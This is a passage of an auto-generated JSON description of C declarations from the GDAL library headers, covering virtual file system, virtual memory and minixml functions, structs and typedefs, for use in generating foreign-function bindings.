"tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nMaxFiles", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "struct", "ns": 0, "name": "VSIDIR", "id": 0, "location": "/usr/include/gdal/cpl_vsi.h:309:16", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "typedef", "ns": 0, "name": "VSIDIR", "location": "/usr/include/gdal/cpl_vsi.h:309:23", "type": { "tag": "struct", "ns": 0, "name": "VSIDIR", "id": 0, "location": "/usr/include/gdal/cpl_vsi.h:309:16", "bit-size": 0, "bit-alignment": 0, "fields": [] } }, { "tag": "function", "name": "VSIOpenDir", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:311:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszPath", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nRecurseDepth", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":pointer", "type": { "tag": "VSIDIR" } } }, { "tag": "struct", "ns": 0, "name": "VSIDIREntry", "id": 0, "location": "/usr/include/gdal/cpl_vsi.h:316:16", "bit-size": 384, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "pszName", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "nMode", "bit-offset": 64, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "nSize", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "vsi_l_offset" } }, { "tag": "field", "name": "nMTime", "bit-offset": 192, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "GIntBig" } }, { "tag": "field", "name": "bModeKnown", "bit-offset": 256, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "bSizeKnown", "bit-offset": 264, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "bMTimeKnown", "bit-offset": 272, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "papszExtra", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }] }, { "tag": "typedef", "ns": 0, "name": "VSIDIREntry", "location": "/usr/include/gdal/cpl_vsi.h:343:3", "type": { "tag": ":struct", "name": "VSIDIREntry", "id": 59 } }, { "tag": "function", "name": "VSIGetNextDirEntry", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:345:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "dir", "type": { "tag": ":pointer", "type": { "tag": "VSIDIR" } } }], "return-type": { "tag": ":pointer", "type": { "tag": "VSIDIREntry" } } }, { "tag": "function", "name": "VSICloseDir", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:346:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "dir", "type": { "tag": ":pointer", "type": { "tag": "VSIDIR" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIMkdir", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:348:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszPathname", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "mode", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIMkdirRecursive", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:349:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszPathname", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "mode", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIRmdir", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:350:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszDirname", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIRmdirRecursive", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:351:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszDirname", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIUnlink", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:352:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIRename", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:353:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "oldpath", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "newpath", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSISync", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:354:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszSource", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pszTarget", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "pProgressFunc", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "ppapszOutputs", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIStrerror", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:360:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "VSIGetDiskFreeSpace", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:361:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszDirname", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "GIntBig" } }, { "tag": "function", "name": "VSIInstallMemFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:366:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallLargeFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:368:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallSubFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:370:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallCurlFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:371:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSICurlClearCache", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:372:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSICurlPartialClearCache", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:373:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilenamePrefix", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallCurlStreamingFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:374:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallS3FileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:375:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallS3StreamingFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:376:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallGSFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:377:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallGSStreamingFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:378:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallAzureFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:379:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallAzureStreamingFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:380:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallOSSFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:381:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallOSSStreamingFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:382:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallSwiftFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:383:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallSwiftStreamingFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:384:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallGZipFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:385:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallZipFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:386:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallStdinHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:387:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallHdfsHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:388:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallWebHdfsHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:389:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallStdoutHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:390:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallSparseFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:391:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallTarFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:392:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIInstallCryptFileHandler", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:393:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSISetCryptKey", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:394:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pabyKey", "type": { "tag": ":pointer", "type": { "tag": "GByte" } } }, { "tag": "parameter", "name": "nKeySize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSICleanupFileManager", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:396:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIFileFromMemBuffer", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:399:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pabyData", "type": { "tag": ":pointer", "type": { "tag": "GByte" } } }, { "tag": "parameter", "name": "nDataLength", "type": { "tag": "vsi_l_offset" } }, { "tag": "parameter", "name": "bTakeOwnership", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }, { "tag": "function", "name": "VSIGetMemFileBuffer", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:403:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pnDataLength", "type": { "tag": ":pointer", "type": { "tag": "vsi_l_offset" } } }, { "tag": "parameter", "name": "bUnlinkAndSeize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": "GByte" } } }, { "tag": "typedef", "ns": 0, "name": "VSIWriteFunction", "location": "/usr/include/gdal/cpl_vsi.h:408:18", "type": { "tag": ":function-pointer" } }, { "tag": "function", "name": "VSIStdoutSetRedirection", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:409:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pFct", "type": { "tag": "VSIWriteFunction" } }, { "tag": "parameter", "name": "stream", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSITime", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:416:23", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "VSICTime", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:417:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "VSIGMTime", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:418:20", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pnTime", "type": { "tag": ":pointer", "type": { "tag": "time_t" } } }, { "tag": "parameter", "name": "poBrokenTime", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }, { "tag": "function", "name": "VSILocalTime", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:420:20", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pnTime", "type": { "tag": ":pointer", "type": { "tag": "time_t" } } }, { "tag": "parameter", "name": "poBrokenTime", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }, { "tag": "struct", "ns": 0, "name": "CPLVirtualMem", "id": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:62:16", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "typedef", "ns": 0, "name": "CPLVirtualMem", "location": "/usr/include/gdal/cpl_virtualmem.h:62:30", "type": { "tag": "struct", "ns": 0, "name": "CPLVirtualMem", "id": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:62:16", "bit-size": 0, "bit-alignment": 0, "fields": [] } }, { "tag": "typedef", "ns": 0, "name": "CPLVirtualMemCachePageCbk", "location": "/usr/include/gdal/cpl_virtualmem.h:74:16", "type": { "tag": ":function-pointer" } }, { "tag": "typedef", "ns": 0, "name": "CPLVirtualMemUnCachePageCbk", "location": "/usr/include/gdal/cpl_virtualmem.h:90:16", "type": { "tag": ":function-pointer" } }, { "tag": "typedef", "ns": 0, "name": "CPLVirtualMemFreeUserData", "location": "/usr/include/gdal/cpl_virtualmem.h:99:16", "type": { "tag": ":function-pointer" } }, { "tag": "enum", "ns": 0, "name": "", "id": 61, "location": "/usr/include/gdal/cpl_virtualmem.h:102:9", "fields": [{ "tag": "field", "name": "VIRTUALMEM_READONLY", "value": 0 }, { "tag": "field", "name": "VIRTUALMEM_READONLY_ENFORCED", "value": 1 }, { "tag": "field", "name": "VIRTUALMEM_READWRITE", "value": 2 }] }, { "tag": "typedef", "ns": 0, "name": "CPLVirtualMemAccessMode", "location": "/usr/include/gdal/cpl_virtualmem.h:113:3", "type": { "tag": ":enum", "name": "", "id": 61 } }, { "tag": "function", "name": "CPLGetPageSize", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:121:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "CPLVirtualMemNew", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:167:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nCacheSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nPageSizeHint", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "bSingleThreadUsage", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eAccessMode", "type": { "tag": "CPLVirtualMemAccessMode" } }, { "tag": "parameter", "name": "pfnCachePage", "type": { "tag": "CPLVirtualMemCachePageCbk" } }, { "tag": "parameter", "name": "pfnUnCachePage", "type": { "tag": "CPLVirtualMemUnCachePageCbk" } }, { "tag": "parameter", "name": "pfnFreeUserData", "type": { "tag": "CPLVirtualMemFreeUserData" } }, { "tag": "parameter", "name": "pCbkUserData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }, { "tag": "function", "name": "CPLIsVirtualMemFileMapAvailable", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:182:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "CPLVirtualMemFileMapNew", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:210:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "fp", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }, { "tag": "parameter", "name": "nOffset", "type": { "tag": "vsi_l_offset" } }, { "tag": "parameter", "name": "nLength", "type": { "tag": "vsi_l_offset" } }, { "tag": "parameter", "name": "eAccessMode", "type": { "tag": "CPLVirtualMemAccessMode" } }, { "tag": "parameter", "name": "pfnFreeUserData", "type": { "tag": "CPLVirtualMemFreeUserData" } }, { "tag": "parameter", "name": "pCbkUserData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }, { "tag": "function", "name": "CPLVirtualMemDerivedNew", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:236:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pVMemBase", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }, { "tag": "parameter", "name": "nOffset", "type": { "tag": "vsi_l_offset" } }, { "tag": "parameter", "name": "nSize", "type": { "tag": "vsi_l_offset" } }, { "tag": "parameter", "name": "pfnFreeUserData", "type": { "tag": "CPLVirtualMemFreeUserData" } }, { "tag": "parameter", "name": "pCbkUserData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }, { "tag": "function", "name": "CPLVirtualMemFree", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:253:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ctxt", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLVirtualMemGetAddr", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:270:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ctxt", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "CPLVirtualMemGetSize", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:279:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ctxt", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "CPLVirtualMemIsFileMapping", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:288:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ctxt", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "CPLVirtualMemGetAccessMode", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:297:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ctxt", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }], "return-type": { "tag": "CPLVirtualMemAccessMode" } }, { "tag": "function", "name": "CPLVirtualMemGetPageSize", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:309:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ctxt", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "CPLVirtualMemIsAccessThreadSafe", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:328:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ctxt", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "CPLVirtualMemDeclareThread", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:342:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ctxt", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLVirtualMemUnDeclareThread", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:356:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ctxt", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLVirtualMemPin", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:375:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ctxt", "type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }, { "tag": "parameter", "name": "pAddr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "bWriteOp", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLVirtualMemManagerTerminate", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:385:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "enum", "ns": 0, "name": "", "id": 62, "location": "/usr/include/gdal/cpl_minixml.h:44:9", "fields": [{ "tag": "field", "name": "CXT_Element", "value": 0 }, { "tag": "field", "name": "CXT_Text", "value": 1 }, { "tag": "field", "name": "CXT_Attribute", "value": 2 }, { "tag": "field", "name": "CXT_Comment", "value": 3 }, { "tag": "field", "name": "CXT_Literal", "value": 4 }] }, { "tag": "typedef", "ns": 0, "name": "CPLXMLNodeType", "location": "/usr/include/gdal/cpl_minixml.h:51:3", "type": { "tag": ":enum", "name": "", "id": 62 } }, { "tag": "struct", "ns": 0, "name": "CPLXMLNode", "id": 0, "location": "/usr/include/gdal/cpl_minixml.h:66:16", "bit-size": 256, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "eType", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": "CPLXMLNodeType" } }, { "tag": "field", "name": "pszValue", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "psNext", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "CPLXMLNode", "id": 63 } } }, { "tag": "field", "name": "psChild", "bit-offset": 192, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "CPLXMLNode", "id": 63 } } }] }, { "tag": "typedef", "ns": 0, "name": "CPLXMLNode", "location": "/usr/include/gdal/cpl_minixml.h:119:3", "type": { "tag": ":struct", "name": "CPLXMLNode", "id": 63 } }, { "tag": "function", "name": "CPLParseXMLString", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:121:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "function", "name": "CPLDestroyXMLNode", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:122:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLGetXMLNode", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:123:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "poRoot", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "pszPath", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "function", "name": "CPLSearchXMLNode", "ns": 0, "location": 